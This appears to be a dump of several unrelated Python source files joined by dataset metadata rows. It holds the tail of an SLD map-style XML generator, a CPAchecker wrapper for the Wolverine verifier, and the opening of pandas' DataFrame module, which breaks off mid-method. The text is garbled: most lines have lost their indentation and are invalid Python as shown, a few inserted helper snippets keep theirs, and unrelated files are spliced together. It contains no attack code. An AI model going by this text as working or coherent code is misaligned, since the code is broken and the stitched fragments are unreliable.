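# accepts an optional filter ("ELSE" maps to an ElseFilter element) and an optional
# scale range, e.g.
#   _rule = {"name": "fallback",
#            "filter": "ELSE",
#            "scaleDenominator": {"min": 1000, "max": 500000},
#            "symbolizers": [{"kind": "Line", "color": "#000000",
#                             "width": 1, "opacity": 1}]}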
def _createSymbolizers(symbolizers):
sldSymbolizers = []
for sl in symbolizers:
symbolizer = _createSymbolizer(sl)
if symbolizer is not None:
if isinstance(symbolizer, list):
sldSymbolizers.extend(symbolizer)
else:
sldSymbolizers.append(symbolizer)
return sldSymbolizers
def _createSymbolizer(sl):
symbolizerType = sl["kind"]
if symbolizerType == "Icon":
symbolizer = _iconSymbolizer(sl)
if symbolizerType == "Line":
symbolizer = _lineSymbolizer(sl)
if symbolizerType == "Fill":
symbolizer = _fillSymbolizer(sl)
if symbolizerType == "Mark":
symbolizer = _markSymbolizer(sl)
if symbolizerType == "Text":
symbolizer = _textSymbolizer(sl)
if symbolizerType == "Raster":
symbolizer = _rasterSymbolizer(sl)
if not isinstance(symbolizer, list):
symbolizer = [symbolizer]
for s in symbolizer:
geom = _geometryFromSymbolizer(sl)
if geom is not None:
s.insert(0, geom)
return symbolizer
def _symbolProperty(sl, name, default=None):
if name in sl:
return _processProperty(sl[name])
else:
return default
def _processProperty(value):
v = convertExpression(value)
if isinstance(v, Element) and v.tag == "ogc:Literal":
v = v.text
return v
def _addValueToElement(element, value):
if value is not None:
if isinstance(value, Element):
element.append(value)
else:
element.text = str(value)
def _addCssParameter(parent, name, value):
if value is not None:
sub = SubElement(parent, "CssParameter", name=name)
_addValueToElement(sub, value)
return sub
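def _example_add_css_parameter():
    # Illustration helper (not part of the original module): appends
    # <CssParameter name="stroke">#ff0000</CssParameter> to a fresh <Stroke> element.
    stroke = Element("Stroke")
    _addCssParameter(stroke, "stroke", "#ff0000")
    return ElementTree.tostring(stroke)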
def _addSubElement(parent, tag, value=None, attrib={}):
strAttrib = {k: str(v) for k, v in attrib.items()}
sub = SubElement(parent, tag, strAttrib)
_addValueToElement(sub, value)
return sub
def _addVendorOption(parent, name, value):
if value is not None:
sub = SubElement(parent, "VendorOption", name=name)
_addValueToElement(sub, value)
return sub
def _rasterSymbolizer(sl):
opacity = sl["opacity"]
root = Element("RasterSymbolizer")
_addSubElement(root, "Opacity", opacity)
channelSelectionElement = _addSubElement(root, "ChannelSelection")
for chanName in ["grayChannel", "redChannel", "greenChannel", "blueChannel"]:
if chanName in sl["channelSelection"]:
sldChanName = chanName[0].upper() + chanName[1:]
channel = _addSubElement(channelSelectionElement, sldChanName)
_addSubElement(
channel,
"SourceChannelName",
sl["channelSelection"][chanName]["sourceChannelName"],
)
if "colorMap" in sl:
colMap = sl["colorMap"]
colMapElement = _addSubElement(
root, "ColorMap", None, {"type": sl["colorMap"]["type"]}
)
for entry in colMap["colorMapEntries"]:
attribs = {
"color": entry["color"],
"quantity": entry["quantity"],
"label": entry["label"],
"opacity": entry["opacity"],
}
_addSubElement(colMapElement, "ColorMapEntry", None, attribs)
return root
def _textSymbolizer(sl):
color = _symbolProperty(sl, "color")
fontFamily = _symbolProperty(sl, "font")
label = _symbolProperty(sl, "label")
size = _symbolProperty(sl, "size")
root = Element("TextSymbolizer")
_addSubElement(root, "Label", label)
fontElem = _addSubElement(root, "Font")
_addCssParameter(fontElem, "font-family", fontFamily)
_addCssParameter(fontElem, "font-size", size)
if "offset" in sl:
placement = _addSubElement(root, "LabelPlacement")
pointPlacement = _addSubElement(placement, "PointPlacement")
if "anchor" in sl:
anchor = sl["anchor"]
# TODO: Use anchor
# centers
achorLoc = _addSubElement(pointPlacement, "AnchorPoint")
_addSubElement(achorLoc, "AnchorPointX", "0.5")
_addSubElement(achorLoc, "AnchorPointY", "0.5")
displacement = _addSubElement(pointPlacement, "Displacement")
offset = sl["offset"]
offsetx = _processProperty(offset[0])
offsety = _processProperty(offset[1])
_addSubElement(displacement, "DisplacementX", offsetx)
_addSubElement(displacement, "DisplacementY", offsety)
if "rotate" in sl:
rotation = _symbolProperty(sl, "rotate")
_addSubElement(displacement, "Rotation", rotation)
elif "perpendicularOffset" in sl and "background" not in sl:
placement = _addSubElement(root, "LabelPlacement")
linePlacement = _addSubElement(placement, "LinePlacement")
offset = sl["perpendicularOffset"]
dist = _processProperty(offset)
_addSubElement(linePlacement, "PerpendicularOffset", dist)
if "haloColor" in sl and "haloSize" in sl:
haloElem = _addSubElement(root, "Halo")
_addSubElement(haloElem, "Radius", sl["haloSize"])
haloFillElem = _addSubElement(haloElem, "Fill")
_addCssParameter(haloFillElem, "fill", sl["haloColor"])
_addCssParameter(haloFillElem, "fill-opacity", sl["haloOpacity"])
fillElem = _addSubElement(root, "Fill")
_addCssParameter(fillElem, "fill", color)
followLine = sl.get("followLine", False)
if followLine:
_addVendorOption(root, "followLine", True)
_addVendorOption(root, "group", "yes")
elif "background" not in sl:
_addVendorOption(root, "autoWrap", 50)
if "background" in sl:
background = sl["background"]
avg_size = max(background["sizeX"], background["sizeY"])
shapeName = "rectangle"
if background["shapeType"] == "circle" or background["shapeType"] == "elipse":
shapeName = "circle"
graphic = _addSubElement(root, "Graphic")
mark = _addSubElement(graphic, "Mark")
_addSubElement(graphic, "Opacity", background["opacity"])
_addSubElement(mark, "WellKnownName", shapeName)
fill = _addSubElement(mark, "Fill")
stroke = _addSubElement(mark, "Stroke")
_addCssParameter(stroke, "stroke", background["strokeColor"])
_addCssParameter(fill, "fill", background["fillColor"])
if background["sizeType"] == "buffer":
_addVendorOption(root, "graphic-resize", "stretch")
_addVendorOption(root, "graphic-margin", str(avg_size))
_addVendorOption(root, "spaceAround", str(25))
else:
_addSubElement(graphic, "Size", str(avg_size))
placement = _addSubElement(root, "LabelPlacement")
pointPlacement = _addSubElement(placement, "PointPlacement")
# centers
achorLoc = _addSubElement(pointPlacement, "AnchorPoint")
_addSubElement(achorLoc, "AnchorPointX", "0.5")
_addSubElement(achorLoc, "AnchorPointY", "0.5")
return root
def _lineSymbolizer(sl, graphicStrokeLayer=0):
opacity = _symbolProperty(sl, "opacity")
color = sl.get("color", None)
graphicStroke = sl.get("graphicStroke", None)
width = _symbolProperty(sl, "width")
dasharray = _symbolProperty(sl, "dasharray")
cap = _symbolProperty(sl, "cap")
join = _symbolProperty(sl, "join")
offset = _symbolProperty(sl, "perpendicularOffset")
root = Element("LineSymbolizer")
symbolizers = [root]
stroke = _addSubElement(root, "Stroke")
if graphicStroke is not None:
graphicStrokeElement = _addSubElement(stroke, "GraphicStroke")
graphic = _graphicFromSymbolizer(graphicStroke[graphicStrokeLayer])
graphicStrokeElement.append(graphic[0])
interval = sl.get("graphicStrokeInterval")
dashOffset = sl.get("graphicStrokeOffset")
size = graphicStroke[graphicStrokeLayer].get("size")
try:
fsize = float(size)
finterval = float(interval)
_addCssParameter(
stroke, "stroke-dasharray", "%s %s" % (str(fsize), str(finterval))
)
except:
_addCssParameter(stroke, "stroke-dasharray", "10 10")
_addCssParameter(stroke, "stroke-dashoffset", dashOffset)
if graphicStrokeLayer == 0 and len(graphicStroke) > 1:
for i in range(1, len(graphicStroke)):
symbolizers.extend(_lineSymbolizer(sl, i))
if color is not None:
_addCssParameter(stroke, "stroke", color)
_addCssParameter(stroke, "stroke-width", width)
_addCssParameter(stroke, "stroke-opacity", opacity)
_addCssParameter(stroke, "stroke-linejoin", join)
_addCssParameter(stroke, "stroke-linecap", cap)
if dasharray is not None:
if cap != "butt":
try:
EXTRA_GAP = 2 * width
tokens = [
int(v) + EXTRA_GAP if i % 2 else int(v)
for i, v in enumerate(dasharray.split(" "))
]
except: # in case width is not a number, but an expression
GAP_FACTOR = 2
tokens = [
int(v) * GAP_FACTOR if i % 2 else int(v)
for i, v in enumerate(dasharray.split(" "))
]
dasharray = " ".join([str(v) for v in tokens])
_addCssParameter(stroke, "stroke-dasharray", dasharray)
if offset is not None:
_addSubElement(root, "PerpendicularOffset", offset)
return symbolizers
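# Illustration of the dash-gap widening above (comment only): with a numeric width of
# 2 and a cap other than "butt", the dash pattern "5 2" becomes "5 6", i.e. every
# second value (the gaps) grows by 2 * width so round/square line caps do not swallow
# the gaps; when the width is an expression rather than a number, the gaps are simply
# doubled instead.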
def _geometryFromSymbolizer(sl):
geomExpr = convertExpression(sl.get("Geometry", None))
if geomExpr is not None:
geomElement = Element("Geometry")
geomElement.append(geomExpr)
return geomElement
def _iconSymbolizer(sl):
path = sl["image"]
if path.lower().endswith("svg"):
return _svgMarkerSymbolizer(sl)
else:
return _rasterImageMarkerSymbolizer(sl)
def _svgMarkerSymbolizer(sl):
root, graphic = _basePointSimbolizer(sl)
svg = _svgGraphic(sl)
graphic.insert(0, svg)
return root
def _rasterImageMarkerSymbolizer(sl):
root, graphic = _basePointSimbolizer(sl)
img = _rasterImageGraphic(sl)
graphic.insert(0, img)
return root
def _markSymbolizer(sl):
root, graphic = _basePointSimbolizer(sl)
mark = _markGraphic(sl)
graphic.insert(0, mark)
return root
def _basePointSimbolizer(sl):
size = _symbolProperty(sl, "size")
rotation = _symbolProperty(sl, "rotate")
opacity = _symbolProperty(sl, "opacity")
offset = sl.get("offset", None)
root = Element("PointSymbolizer")
graphic = _addSubElement(root, "Graphic")
_addSubElement(graphic, "Opacity", opacity)
_addSubElement(graphic, "Size", size)
_addSubElement(graphic, "Rotation", rotation)
if offset:
displacement = _addSubElement(graphic, "Displacement")
_addSubElement(displacement, "DisplacementX", offset[0])
_addSubElement(displacement, "DisplacementY", offset[1])
return root, graphic
def _markGraphic(sl):
color = _symbolProperty(sl, "color")
outlineColor = _symbolProperty(sl, "strokeColor")
fillOpacity = _symbolProperty(sl, "fillOpacity", 1.0)
strokeOpacity = _symbolProperty(sl, "strokeOpacity", 1.0)
outlineWidth = _symbolProperty(sl, "strokeWidth")
outlineDasharray = _symbolProperty(sl, "strokeDasharray")
shape = _symbolProperty(sl, "wellKnownName")
mark = Element("Mark")
_addSubElement(mark, "WellKnownName", shape)
if fillOpacity:
fill = SubElement(mark, "Fill")
_addCssParameter(fill, "fill", color)
_addCssParameter(fill, "fill-opacity", fillOpacity)
stroke = _addSubElement(mark, "Stroke")
if strokeOpacity:
_addCssParameter(stroke, "stroke", outlineColor)
_addCssParameter(stroke, "stroke-width", outlineWidth)
_addCssParameter(stroke, "stroke-opacity", strokeOpacity)
if outlineDasharray is not None:
_addCssParameter(stroke, "stroke-dasharray", outlineDasharray)
return mark
def _svgGraphic(sl):
path = os.path.basename(sl["image"])
color = _symbolProperty(sl, "color")
outlineColor = _symbolProperty(sl, "strokeColor")
outlineWidth = _symbolProperty(sl, "strokeWidth")
mark = Element("Mark")
_addSubElement(mark, "WellKnownName", "file://%s" % path)
fill = _addSubElement(mark, "Fill")
_addCssParameter(fill, "fill", color)
stroke = _addSubElement(mark, "Stroke")
_addCssParameter(stroke, "stroke", outlineColor)
_addCssParameter(stroke, "stroke-width", outlineWidth)
return mark
def _rasterImageGraphic(sl):
path = os.path.basename(sl["image"])
externalGraphic = Element("ExternalGraphic")
attrib = {"xlink:type": "simple", "xlink:href": path}
SubElement(externalGraphic, "OnlineResource", attrib=attrib)
_addSubElement(
externalGraphic, "Format", "image/%s" % os.path.splitext(path)[1][1:]
)
return externalGraphic
def _baseFillSymbolizer(sl):
root = Element("PolygonSymbolizer")
return root
def _graphicFromSymbolizer(sl):
symbolizers = _createSymbolizer(sl)
graphics = []
for s in symbolizers:
graphics.extend([graph for graph in s.iter("Graphic")])
return graphics
def _fillSymbolizer(sl, graphicFillLayer=0):
root = _baseFillSymbolizer(sl)
symbolizers = [root]
opacity = float(_symbolProperty(sl, "opacity", 1))
color = sl.get("color", None)
graphicFill = sl.get("graphicFill", None)
offset = sl.get("offset", None)
if graphicFill is not None:
margin = _symbolProperty(sl, "graphicFillMarginX")
fill = _addSubElement(root, "Fill")
graphicFillElement = _addSubElement(fill, "GraphicFill")
graphic = _graphicFromSymbolizer(graphicFill[graphicFillLayer])
graphicFillElement.append(graphic[0])
_addVendorOption(root, "graphic-margin", margin)
if graphicFillLayer == 0 and len(graphicFill) > 1:
for i in range(1, len(graphicFill)):
symbolizers.extend(_fillSymbolizer(sl, i))
if color is not None:
fillOpacity = float(_symbolProperty(sl, "fillOpacity", 1))
fill = _addSubElement(root, "Fill")
_addCssParameter(fill, "fill", color)
_addCssParameter(fill, "fill-opacity", fillOpacity * opacity)
outlineColor = _symbolProperty(sl, "outlineColor")
if outlineColor is not None:
outlineDasharray = _symbolProperty(sl, "outlineDasharray")
outlineWidth = _symbolProperty(sl, "outlineWidth")
outlineOpacity = float(_symbolProperty(sl, "outlineOpacity"))
# borderWidthUnits = props["outline_width_unit"]
stroke = _addSubElement(root, "Stroke")
_addCssParameter(stroke, "stroke", outlineColor)
_addCssParameter(stroke, "stroke-width", outlineWidth)
_addCssParameter(stroke, "stroke-opacity", outlineOpacity * opacity)
# _addCssParameter(stroke, "stroke-linejoin", join)
# _addCssParameter(stroke, "stroke-linecap", cap)
if outlineDasharray is not None:
_addCssParameter(
stroke, "stroke-dasharray", " ".join(str(v) for v in outlineDasharray)
)
if offset:
pass # TODO: Not sure how to add this in SLD
return symbolizers
#######################
operators = [
"PropertyName",
"Or",
"And",
"PropertyIsEqualTo",
"PropertyIsNotEqualTo",
"PropertyIsLessThanOrEqualTo",
"PropertyIsGreaterThanOrEqualTo",
"PropertyIsLessThan",
"PropertyIsGreaterThan",
"PropertyIsLike",
"Add",
"Sub",
"Mul",
"Div",
"Not",
]
operatorToFunction = {
"PropertyIsEqualTo": "equalTo",
"PropertyIsNotEqualTo": "notEqual",
"PropertyIsLessThanOrEqualTo": "lessEqualThan",
"PropertyIsGreaterThanOrEqualTo": "greaterEqualThan",
"PropertyIsLessThan": "lessThan",
"PropertyIsGreaterThan": "greaterThan",
}
def convertExpression(exp, inFunction=False):
if exp is None:
return None
elif isinstance(exp, list):
if exp[0] in operators and not (inFunction and exp[0] in operatorToFunction):
return handleOperator(exp)
else:
return handleFunction(exp)
else:
return handleLiteral(exp)
def handleOperator(exp):
name = exp[0]
elem = Element("ogc:" + name)
if name == "PropertyIsLike":
elem.attrib["wildCard"] = "%"
if name == "PropertyName":
elem.text = exp[1]
else:
for operand in exp[1:]:
elem.append(convertExpression(operand))
return elem
def handleFunction(exp):
name = operatorToFunction.get(exp[0], exp[0])
elem = Element("ogc:Function", name=name)
if len(exp) > 1:
for arg in exp[1:]:
elem.append(convertExpression(arg, True))
return elem
def handleLiteral(v):
elem = Element("ogc:Literal")
elem.text = str(v)
return elem
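# Illustrative sketch (an addition for clarity; assumptions noted below): the
# nested-list expression format consumed by convertExpression() puts the
# operator name first and its operands after it. The demo assumes Element is
# imported from xml.etree.ElementTree, which is what the Element()/SubElement()
# calls in this module appear to rely on.
if __name__ == "__main__":
from xml.etree.ElementTree import tostring
_demo_expr = ["PropertyIsEqualTo", ["PropertyName", "name"], "river"]
# Expected shape of the result: an <ogc:PropertyIsEqualTo> element wrapping
# an <ogc:PropertyName> child ("name") and an <ogc:Literal> child ("river").
print(tostring(convertExpression(_demo_expr)))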
| gpl-2.0 | 1,951,233,122,359,109,400 | 33.601667 | 111 | 0.630943 | false |
TommesDee/cpachecker | scripts/benchmark/tools/wolverine.py | 2 | 1148 | import subprocess
import benchmark.util as Util
import benchmark.tools.template
import benchmark.result as result
class Tool(benchmark.tools.template.BaseTool):
def getExecutable(self):
return Util.findExecutable('wolverine')
def getVersion(self, executable):
return subprocess.Popen([executable, '--version'],
stdout=subprocess.PIPE).communicate()[0].split()[1].strip()
def getName(self):
return 'Wolverine'
def getStatus(self, returncode, returnsignal, output, isTimeout):
if "VERIFICATION SUCCESSFUL" in output:
assert returncode == 0
status = result.STR_TRUE
elif "VERIFICATION FAILED" in output:
assert returncode == 10
status = result.STR_FALSE_LABEL
elif returnsignal == 9:
status = "TIMEOUT"
elif returnsignal == 6 or (returncode == 6 and "Out of memory" in output):
status = "OUT OF MEMORY"
elif returncode == 6 and "PARSING ERROR" in output:
status = "PARSING ERROR"
else:
status = "FAILURE"
return status | apache-2.0 | 3,404,873,571,651,703,300 | 30.054054 | 91 | 0.614111 | false |
zfrenchee/pandas | pandas/core/frame.py | 1 | 233731 | """
DataFrame
---------
An efficient 2D container for potentially mixed-type time series or other
labeled data series.
Similar to its R counterpart, data.frame, except providing automatic data
alignment and a host of useful data manipulation methods having to do with the
labeling information
"""
from __future__ import division
# pylint: disable=E1101,E1103
# pylint: disable=W0212,W0231,W0703,W0622
import functools
import collections
import itertools
import sys
import types
import warnings
from textwrap import dedent
import numpy as np
import numpy.ma as ma
from pandas.core.dtypes.cast import (
maybe_upcast,
cast_scalar_to_array,
maybe_cast_to_datetime,
maybe_infer_to_datetimelike,
maybe_convert_platform,
maybe_downcast_to_dtype,
invalidate_string_dtypes,
coerce_to_dtypes,
maybe_upcast_putmask,
find_common_type)
from pandas.core.dtypes.common import (
is_categorical_dtype,
is_object_dtype,
is_extension_type,
is_datetimetz,
is_datetime64_any_dtype,
is_datetime64tz_dtype,
is_bool_dtype,
is_integer_dtype,
is_float_dtype,
is_integer,
is_scalar,
is_dtype_equal,
needs_i8_conversion,
_get_dtype_from_object,
_ensure_float,
_ensure_float64,
_ensure_int64,
_ensure_platform_int,
is_list_like,
is_nested_list_like,
is_iterator,
is_sequence,
is_named_tuple)
from pandas.core.dtypes.missing import isna, notna
from pandas.core.common import (_try_sort,
_default_index,
_values_from_object,
_maybe_box_datetimelike,
_dict_compat,
standardize_mapping)
from pandas.core.generic import NDFrame, _shared_docs
from pandas.core.index import (Index, MultiIndex, _ensure_index,
_ensure_index_from_sequences)
from pandas.core.indexing import (maybe_droplevels, convert_to_index_sliceable,
check_bool_indexer)
from pandas.core.internals import (BlockManager,
create_block_manager_from_arrays,
create_block_manager_from_blocks)
from pandas.core.series import Series
from pandas.core.categorical import Categorical
import pandas.core.algorithms as algorithms
from pandas.compat import (range, map, zip, lrange, lmap, lzip, StringIO, u,
OrderedDict, raise_with_traceback)
from pandas import compat
from pandas.compat import PY36
from pandas.compat.numpy import function as nv
from pandas.util._decorators import (Appender, Substitution,
rewrite_axis_style_signature)
from pandas.util._validators import (validate_bool_kwarg,
validate_axis_style_args)
from pandas.core.indexes.period import PeriodIndex
from pandas.core.indexes.datetimes import DatetimeIndex
from pandas.core.indexes.timedeltas import TimedeltaIndex
from pandas.core import accessor
import pandas.core.common as com
import pandas.core.nanops as nanops
import pandas.core.ops as ops
import pandas.io.formats.format as fmt
import pandas.io.formats.console as console
from pandas.io.formats.printing import pprint_thing
import pandas.plotting._core as gfx
from pandas._libs import lib, algos as libalgos
from pandas.core.config import get_option
# ---------------------------------------------------------------------
# Docstring templates
_shared_doc_kwargs = dict(
axes='index, columns', klass='DataFrame',
axes_single_arg="{0 or 'index', 1 or 'columns'}",
optional_by="""
by : str or list of str
Name or list of names which refer to the axis items.""",
versionadded_to_excel='',
optional_labels="""labels : array-like, optional
New labels / index to conform the axis specified by 'axis' to.""",
optional_axis="""axis : int or str, optional
Axis to target. Can be either the axis name ('index', 'columns')
or number (0, 1).""",
)
_numeric_only_doc = """numeric_only : boolean, default None
Include only float, int, boolean data. If None, will attempt to use
everything, then use only numeric data
"""
_merge_doc = """
Merge DataFrame objects by performing a database-style join operation by
columns or indexes.
If joining columns on columns, the DataFrame indexes *will be
ignored*. Otherwise if joining indexes on indexes or indexes on a column or
columns, the index will be passed on.
Parameters
----------%s
right : DataFrame
how : {'left', 'right', 'outer', 'inner'}, default 'inner'
* left: use only keys from left frame, similar to a SQL left outer join;
preserve key order
* right: use only keys from right frame, similar to a SQL right outer join;
preserve key order
* outer: use union of keys from both frames, similar to a SQL full outer
join; sort keys lexicographically
* inner: use intersection of keys from both frames, similar to a SQL inner
join; preserve the order of the left keys
on : label or list
Column or index level names to join on. These must be found in both
DataFrames. If `on` is None and not merging on indexes then this defaults
to the intersection of the columns in both DataFrames.
left_on : label or list, or array-like
Column or index level names to join on in the left DataFrame. Can also
be an array or list of arrays of the length of the left DataFrame.
These arrays are treated as if they are columns.
right_on : label or list, or array-like
Column or index level names to join on in the right DataFrame. Can also
be an array or list of arrays of the length of the right DataFrame.
These arrays are treated as if they are columns.
left_index : boolean, default False
Use the index from the left DataFrame as the join key(s). If it is a
MultiIndex, the number of keys in the other DataFrame (either the index
or a number of columns) must match the number of levels
right_index : boolean, default False
Use the index from the right DataFrame as the join key. Same caveats as
left_index
sort : boolean, default False
Sort the join keys lexicographically in the result DataFrame. If False,
the order of the join keys depends on the join type (how keyword)
suffixes : 2-length sequence (tuple, list, ...)
Suffix to apply to overlapping column names in the left and right
side, respectively
copy : boolean, default True
If False, do not copy data unnecessarily
indicator : boolean or string, default False
If True, adds a column to output DataFrame called "_merge" with
information on the source of each row.
If string, column with information on source of each row will be added to
output DataFrame, and column will be named value of string.
Information column is Categorical-type and takes on a value of "left_only"
for observations whose merge key only appears in 'left' DataFrame,
"right_only" for observations whose merge key only appears in 'right'
DataFrame, and "both" if the observation's merge key is found in both.
validate : string, default None
If specified, checks if merge is of specified type.
* "one_to_one" or "1:1": check if merge keys are unique in both
left and right datasets.
* "one_to_many" or "1:m": check if merge keys are unique in left
dataset.
* "many_to_one" or "m:1": check if merge keys are unique in right
dataset.
* "many_to_many" or "m:m": allowed, but does not result in checks.
.. versionadded:: 0.21.0
Notes
-----
Support for specifying index levels as the `on`, `left_on`, and
`right_on` parameters was added in version 0.23.0
Examples
--------
>>> A >>> B
lkey value rkey value
0 foo 1 0 foo 5
1 bar 2 1 bar 6
2 baz 3 2 qux 7
3 foo 4 3 bar 8
>>> A.merge(B, left_on='lkey', right_on='rkey', how='outer')
lkey value_x rkey value_y
0 foo 1 foo 5
1 foo 4 foo 5
2 bar 2 bar 6
3 bar 2 bar 8
4 baz 3 NaN NaN
5 NaN NaN qux 7
Returns
-------
merged : DataFrame
The output type will be the same as 'left', if it is a subclass
of DataFrame.
See also
--------
merge_ordered
merge_asof
"""
# -----------------------------------------------------------------------
# DataFrame class
class DataFrame(NDFrame):
""" Two-dimensional size-mutable, potentially heterogeneous tabular data
structure with labeled axes (rows and columns). Arithmetic operations
align on both row and column labels. Can be thought of as a dict-like
container for Series objects. The primary pandas data structure
Parameters
----------
data : numpy ndarray (structured or homogeneous), dict, or DataFrame
Dict can contain Series, arrays, constants, or list-like objects
index : Index or array-like
Index to use for resulting frame. Will default to np.arange(n) if
no indexing information part of input data and no index provided
columns : Index or array-like
Column labels to use for resulting frame. Will default to
np.arange(n) if no column labels are provided
dtype : dtype, default None
Data type to force. Only a single dtype is allowed. If None, infer
copy : boolean, default False
Copy data from inputs. Only affects DataFrame / 2d ndarray input
Examples
--------
Constructing DataFrame from a dictionary.
>>> d = {'col1': [1, 2], 'col2': [3, 4]}
>>> df = pd.DataFrame(data=d)
>>> df
col1 col2
0 1 3
1 2 4
Notice that the inferred dtype is int64.
>>> df.dtypes
col1 int64
col2 int64
dtype: object
To enforce a single dtype:
>>> df = pd.DataFrame(data=d, dtype=np.int8)
>>> df.dtypes
col1 int8
col2 int8
dtype: object
Constructing DataFrame from numpy ndarray:
>>> df2 = pd.DataFrame(np.random.randint(low=0, high=10, size=(5, 5)),
... columns=['a', 'b', 'c', 'd', 'e'])
>>> df2
a b c d e
0 2 8 8 3 4
1 4 2 9 0 9
2 1 0 7 8 0
3 5 1 7 1 3
4 6 0 2 4 2
See also
--------
DataFrame.from_records : constructor from tuples, also record arrays
DataFrame.from_dict : from dicts of Series, arrays, or dicts
DataFrame.from_items : from sequence of (key, value) pairs
pandas.read_csv, pandas.read_table, pandas.read_clipboard
"""
@property
def _constructor(self):
return DataFrame
_constructor_sliced = Series
_deprecations = NDFrame._deprecations | frozenset(
['sortlevel', 'get_value', 'set_value', 'from_csv'])
@property
def _constructor_expanddim(self):
from pandas.core.panel import Panel
return Panel
def __init__(self, data=None, index=None, columns=None, dtype=None,
copy=False):
if data is None:
data = {}
if dtype is not None:
dtype = self._validate_dtype(dtype)
if isinstance(data, DataFrame):
data = data._data
if isinstance(data, BlockManager):
mgr = self._init_mgr(data, axes=dict(index=index, columns=columns),
dtype=dtype, copy=copy)
elif isinstance(data, dict):
mgr = self._init_dict(data, index, columns, dtype=dtype)
elif isinstance(data, ma.MaskedArray):
import numpy.ma.mrecords as mrecords
# masked recarray
if isinstance(data, mrecords.MaskedRecords):
mgr = _masked_rec_array_to_mgr(data, index, columns, dtype,
copy)
# a masked array
else:
mask = ma.getmaskarray(data)
if mask.any():
data, fill_value = maybe_upcast(data, copy=True)
data[mask] = fill_value
else:
data = data.copy()
mgr = self._init_ndarray(data, index, columns, dtype=dtype,
copy=copy)
elif isinstance(data, (np.ndarray, Series, Index)):
if data.dtype.names:
data_columns = list(data.dtype.names)
data = {k: data[k] for k in data_columns}
if columns is None:
columns = data_columns
mgr = self._init_dict(data, index, columns, dtype=dtype)
elif getattr(data, 'name', None) is not None:
mgr = self._init_dict({data.name: data}, index, columns,
dtype=dtype)
else:
mgr = self._init_ndarray(data, index, columns, dtype=dtype,
copy=copy)
elif isinstance(data, (list, types.GeneratorType)):
if isinstance(data, types.GeneratorType):
data = list(data)
if len(data) > 0:
if is_list_like(data[0]) and getattr(data[0], 'ndim', 1) == 1:
if is_named_tuple(data[0]) and columns is None:
columns = data[0]._fields
arrays, columns = _to_arrays(data, columns, dtype=dtype)
columns = _ensure_index(columns)
# set the index
if index is None:
if isinstance(data[0], Series):
index = _get_names_from_index(data)
elif isinstance(data[0], Categorical):
index = _default_index(len(data[0]))
else:
index = _default_index(len(data))
mgr = _arrays_to_mgr(arrays, columns, index, columns,
dtype=dtype)
else:
mgr = self._init_ndarray(data, index, columns, dtype=dtype,
copy=copy)
else:
mgr = self._init_dict({}, index, columns, dtype=dtype)
elif isinstance(data, collections.Iterator):
raise TypeError("data argument can't be an iterator")
else:
try:
arr = np.array(data, dtype=dtype, copy=copy)
except (ValueError, TypeError) as e:
exc = TypeError('DataFrame constructor called with '
'incompatible data and dtype: %s' % e)
raise_with_traceback(exc)
if arr.ndim == 0 and index is not None and columns is not None:
values = cast_scalar_to_array((len(index), len(columns)),
data, dtype=dtype)
mgr = self._init_ndarray(values, index, columns,
dtype=values.dtype, copy=False)
else:
raise ValueError('DataFrame constructor not properly called!')
NDFrame.__init__(self, mgr, fastpath=True)
def _init_dict(self, data, index, columns, dtype=None):
"""
Segregate Series based on type and coerce into matrices.
Needs to handle a lot of exceptional cases.
"""
if columns is not None:
columns = _ensure_index(columns)
# GH10856
# raise ValueError if only scalars in dict
if index is None:
extract_index(list(data.values()))
# prefilter if columns passed
data = {k: v for k, v in compat.iteritems(data) if k in columns}
if index is None:
index = extract_index(list(data.values()))
else:
index = _ensure_index(index)
arrays = []
data_names = []
for k in columns:
if k not in data:
# no obvious "empty" int column
if dtype is not None and issubclass(dtype.type,
np.integer):
continue
if dtype is None:
# 1783
v = np.empty(len(index), dtype=object)
elif np.issubdtype(dtype, np.flexible):
v = np.empty(len(index), dtype=object)
else:
v = np.empty(len(index), dtype=dtype)
v.fill(np.nan)
else:
v = data[k]
data_names.append(k)
arrays.append(v)
else:
keys = list(data.keys())
if not isinstance(data, OrderedDict):
keys = _try_sort(keys)
columns = data_names = Index(keys)
arrays = [data[k] for k in keys]
return _arrays_to_mgr(arrays, data_names, index, columns, dtype=dtype)
def _init_ndarray(self, values, index, columns, dtype=None, copy=False):
# input must be a ndarray, list, Series, index
if isinstance(values, Series):
if columns is None:
if values.name is not None:
columns = [values.name]
if index is None:
index = values.index
else:
values = values.reindex(index)
# zero len case (GH #2234)
if not len(values) and columns is not None and len(columns):
values = np.empty((0, 1), dtype=object)
# helper to create the axes as indexes
def _get_axes(N, K, index=index, columns=columns):
# return axes or defaults
if index is None:
index = _default_index(N)
else:
index = _ensure_index(index)
if columns is None:
columns = _default_index(K)
else:
columns = _ensure_index(columns)
return index, columns
# we could have a categorical type passed or coerced to 'category'
# recast this to an _arrays_to_mgr
if (is_categorical_dtype(getattr(values, 'dtype', None)) or
is_categorical_dtype(dtype)):
if not hasattr(values, 'dtype'):
values = _prep_ndarray(values, copy=copy)
values = values.ravel()
elif copy:
values = values.copy()
index, columns = _get_axes(len(values), 1)
return _arrays_to_mgr([values], columns, index, columns,
dtype=dtype)
elif is_datetimetz(values):
return self._init_dict({0: values}, index, columns, dtype=dtype)
# by definition an array here
# the dtypes will be coerced to a single dtype
values = _prep_ndarray(values, copy=copy)
if dtype is not None:
if not is_dtype_equal(values.dtype, dtype):
try:
values = values.astype(dtype)
except Exception as orig:
e = ValueError("failed to cast to '%s' (Exception was: %s)"
% (dtype, orig))
raise_with_traceback(e)
index, columns = _get_axes(*values.shape)
values = values.T
# if we don't have a dtype specified, then try to convert objects
# on the entire block; this is to convert if we have datetimelike's
# embedded in an object type
if dtype is None and is_object_dtype(values):
values = maybe_infer_to_datetimelike(values)
return create_block_manager_from_blocks([values], [columns, index])
@property
def axes(self):
"""
Return a list with the row axis labels and column axis labels as the
only members. They are returned in that order.
"""
return [self.index, self.columns]
@property
def shape(self):
"""
Return a tuple representing the dimensionality of the DataFrame.
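Examples
--------
A minimal sketch:
>>> df = pd.DataFrame({'col1': [1, 2], 'col2': [3, 4]})
>>> df.shape
(2, 2)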
"""
return len(self.index), len(self.columns)
def _repr_fits_vertical_(self):
"""
Check length against max_rows.
"""
max_rows = get_option("display.max_rows")
return len(self) <= max_rows
def _repr_fits_horizontal_(self, ignore_width=False):
"""
Check if full repr fits in horizontal boundaries imposed by the display
options width and max_columns. In case of a non-interactive session, no
boundaries apply.
ignore_width is here so IPython notebook + HTML output can behave the
way users expect. display.max_columns remains in effect.
GH3541, GH3573
"""
width, height = console.get_console_size()
max_columns = get_option("display.max_columns")
nb_columns = len(self.columns)
# exceed max columns
